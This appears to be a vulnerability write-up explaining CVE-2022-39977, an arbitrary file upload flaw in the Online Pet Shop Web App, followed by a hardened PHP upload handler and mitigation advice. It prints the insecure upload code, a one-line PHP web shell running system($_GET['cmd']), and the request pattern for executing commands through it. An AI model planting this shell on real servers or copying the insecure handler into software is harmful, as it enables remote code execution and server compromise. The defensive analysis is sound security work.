A critical security vulnerability, tracked as CVE-2022-39977, has been discovered in the Online Pet Shop Web App v1. It allows an authenticated user to achieve remote code execution by uploading a crafted PHP file through the profile picture upload point in the User module. A threat actor who exploits it can run commands on the web server, manipulate user accounts, and access any other sensitive data related to the pet shop's operations.

In this post, we will explore the details of this vulnerability, including code snippets to understand the exploit better and links to original references for further research.

Vulnerability Details

The arbitrary file upload vulnerability arises from an insecure implementation of the Editing function in the User module, which lets users upload an image as their profile picture. Because the function neither validates the file's content type nor restricts the file extension, an attacker can upload a PHP file instead of an image. The file is stored under the web root in the uploads/ directory, so requesting its URL causes the server to execute it, resulting in remote code execution (RCE).

Code Snippet

In the vulnerable code for the Editing function, note that the upload process never checks the uploaded file's type: it only checks the upload error code and the size, then stores the file under a random name while keeping whatever extension the client supplied.

// Insecure file upload code snippet (behaviour as in the vulnerable app):

<?php
function uploadProfilePicture() {
  $fileName = $_FILES['picture']['name'];      // client-controlled original filename
  $fileTmp = $_FILES['picture']['tmp_name'];
  $fileSize = $_FILES['picture']['size'];
  $fileError = $_FILES['picture']['error'];

  // The extension is taken verbatim from the client-supplied name
  $fileExt = explode('.', $fileName);
  $fileActualExt = strtolower(end($fileExt));

  // Arbitrary file upload occurs here: neither the extension nor the content type is checked
  if ($fileError === 0) {                      // 0 is UPLOAD_ERR_OK
    if ($fileSize < 100000) {
      // The file is renamed, but keeps the attacker-chosen extension (e.g. .php)
      $fileNameNew = uniqid('', true) . "." . $fileActualExt;
      $fileDestination = 'uploads/' . $fileNameNew;
      move_uploaded_file($fileTmp, $fileDestination);
      return $fileDestination;
    } else {
      // Error message if the file exceeds the size limit
    }
  } else {
    // Error message if an error occurred when uploading the file
  }
}

To exploit this vulnerability, an attacker only needs a minimal PHP web shell such as the following, which runs whatever command is passed in the cmd query parameter:

# Malicious PHP file (malicious.php):
<?php
  // Executes the attacker-supplied command on the web server and echoes its output
  system($_GET['cmd']);
?>

The attacker uploads this file as their profile picture. The snippet above renames the file with uniqid() but preserves the .php extension, so the stored path is whatever uploadProfilePicture() returns (the application exposes it as the profile picture's URL). Requesting that file with a command appended, for example https://target-web-app/uploads/malicious.php?cmd=<COMMAND>, executes <COMMAND> with the privileges of the web server process.

References

- CVE-2022-39977 - Arbitrary File Upload Vulnerability in Online Pet Shop Web App v1.

- Exploit-DB Entry for CVE-2022-39977

- Online Pet Shop Web App on GitHub (v1.)

Conclusion

The arbitrary file upload vulnerability in the Online Pet Shop Web App v1., identified as CVE-2022-39977, can lead to full compromise of the hosting server if exploited. To mitigate it, the developers should validate uploads by content rather than by the client-supplied name, accept only an allowlist of image types, assign the stored filename and extension server-side, and configure the web server so that nothing under uploads/ is ever executed as PHP.
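The following hardened handler is an added example, not code from the Online Pet Shop Web App or its author; it shows how the upload function from the Code Snippet section could be rewritten to enforce the checks listed above. The field name 'picture', the uploads/ directory and the 100000-byte limit are taken from the vulnerable snippet on this page; the function name uploadProfilePictureSafe, the allowlist and the exception messages are assumptions made for the example.

```php
<?php
// Added example: a hardened replacement for the vulnerable uploadProfilePicture().
// Assumed names: uploadProfilePictureSafe, $uploadDir. Field name 'picture',
// uploads/ directory and the 100000-byte limit come from the original snippet.

function uploadProfilePictureSafe(array $file, string $uploadDir = 'uploads'): string
{
    // Trust only the server-side error code, never $_FILES[...]['name'] or ['type'].
    if (!isset($file['error']) || $file['error'] !== UPLOAD_ERR_OK) {
        throw new RuntimeException('Upload failed with error code ' . ($file['error'] ?? 'unknown'));
    }
    if ($file['size'] > 100000) {
        throw new RuntimeException('File exceeds the 100000-byte limit');
    }
    // Reject anything that did not arrive through this request's multipart upload.
    if (!is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('Not an uploaded file');
    }

    // 1. Allowlist of permitted image types. The key is the MIME type detected
    //    from the bytes; the value is the extension the server will assign.
    $allowed = [
        'image/jpeg' => 'jpg',
        'image/png'  => 'png',
        'image/gif'  => 'gif',
    ];

    // 2. Detect the content type from the file's bytes (libmagic), not from the client.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime  = $finfo->file($file['tmp_name']);
    if ($mime === false || !isset($allowed[$mime])) {
        throw new RuntimeException('Unsupported content type: ' . var_export($mime, true));
    }

    // 3. Require a parseable image header. A PHP script renamed to .jpg fails here
    //    (a real image with PHP appended does not, which is why steps 4 and 5 matter).
    if (getimagesize($file['tmp_name']) === false) {
        throw new RuntimeException('File is not a valid image');
    }

    // 4. Never reuse the client-supplied filename or extension. The name is random
    //    and the extension comes from the allowlist, so a ".php" can never be stored.
    $newName = bin2hex(random_bytes(16)) . '.' . $allowed[$mime];
    $dest    = rtrim($uploadDir, '/') . '/' . $newName;

    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('Could not store uploaded file');
    }

    // 5. Drop any execute bit. Defence in depth: the web server must also be
    //    configured to refuse to run scripts from the uploads directory.
    chmod($dest, 0644);

    return $dest;
}

// Usage from the profile editing handler (replaces the vulnerable call):
// try {
//     $path = uploadProfilePictureSafe($_FILES['picture']);
// } catch (RuntimeException $e) {
//     // report $e->getMessage() to the user and abort the profile update
// }
```

Two design points are worth spelling out. First, a denylist of extensions (blocking only .php) is not enough, because PHP handlers commonly also serve .phtml, .phar or .php5 and the set varies by server configuration; assigning the extension from an allowlist removes that guesswork. Second, getimagesize() only proves the file starts with an image header, so a valid image with PHP appended still passes step 3; the RCE is actually prevented by the fact that the stored file can never carry an executable extension and by the web server being configured not to execute anything under uploads/.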

If you run this application as a pet shop owner or system administrator, update to a fixed release or apply the vendor's security patches as soon as they are available. Until then, treat the uploads/ directory as untrusted: configure the web server not to execute scripts from it, and check it for files that are not images.

Timeline

Published on: 10/27/2022 20:15:00 UTC
Last modified on: 10/28/2022 19:07:00 UTC